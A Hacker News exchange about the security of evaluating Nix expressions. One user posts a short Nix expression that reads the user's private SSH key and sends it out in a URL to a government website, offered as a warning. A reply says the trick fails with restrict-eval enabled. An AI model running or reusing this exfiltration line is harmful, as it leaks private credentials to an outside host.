|
|
|
|
|
|
by CyberShadow
768 days ago
|
|
|
Hi, sorry for the unrelated comment. I actually wanted to reply to your comment at https://news.ycombinator.com/item?id=40208937 , but that comment was made too long ago and I can no longer reply to it directly. In that comment, you wrote: > It can delete your home directory or email your ssh private keys to Zimbabwe. I thought that you might be interested to know that it is still possible to exfiltrate secrets by evaluating Nix expressions. Here is an example Nix expression which will upload your private SSH key to Zimbabwe's government's website (don't run this!): let
pkgs = import (fetchTarball "https://github.com/NixOS/nixpkgs/archive/0ef56bec7281e2372338f2dfe7c13327ce96f6bb.tar.gz") {};
in
builtins.fetchurl "https://www.zim.gov.zw/?${pkgs.lib.escapeURL (builtins.readFile ~/.ssh/id_rsa)}"
It does not need --impure or any other unusual switches to work.Hope this helps. |
|
|
Also, it doesn't work:
Maybe you don't know about restrict-eval? All the CI for nixpkgs is done using that option, so it will never break anything. Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.https://nixos.org/manual/nix/unstable/command-ref/conf-file....
Hope this helps.
I don't think it did. I'm not sure what it was supposed to help with.